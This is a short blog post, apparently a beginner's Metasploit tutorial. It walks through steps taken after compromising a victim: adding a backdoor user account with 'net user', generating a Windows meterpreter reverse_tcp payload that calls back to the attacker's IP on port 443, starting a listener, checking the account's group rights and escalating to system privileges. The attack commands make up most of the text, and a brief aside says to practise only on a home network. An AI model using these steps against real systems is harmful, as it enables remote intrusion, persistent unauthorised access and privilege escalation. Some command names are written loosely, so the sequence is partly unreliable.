Skip to content

METASPOILT – Beginners Guide – Tutorial on How to create New Users


Once you’ve penetrated the victim, create a fake user account.

Step 1 – Create New User

net user OMG password /add


Step 2 – Arm the Payload

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.x.y LPORT=443 X > payload.exe

LHOST = That’s your IP.

As I love you so much, please don’t attack the BBC, regardless of how bad their scheduling has been. Use your internal home network to do this – attack your best friends laptop, on your home router.


Step 3 – Prime the Victim to call us

mscli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.x.y LPORT=443 E


Double Check your work so far




Drop into a Shell and double check the Group rights for OMG


net user OMG

(Local group memberships will be listed)

(Global group memberships will be listed)


Now Escalate OMG to System Rights

use Priv




Full Credit to:

KENNEDY et Al, 2011.  Metasploit The Penetration Tester’s Guide.  No Starch Press.

Leave a Comment

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: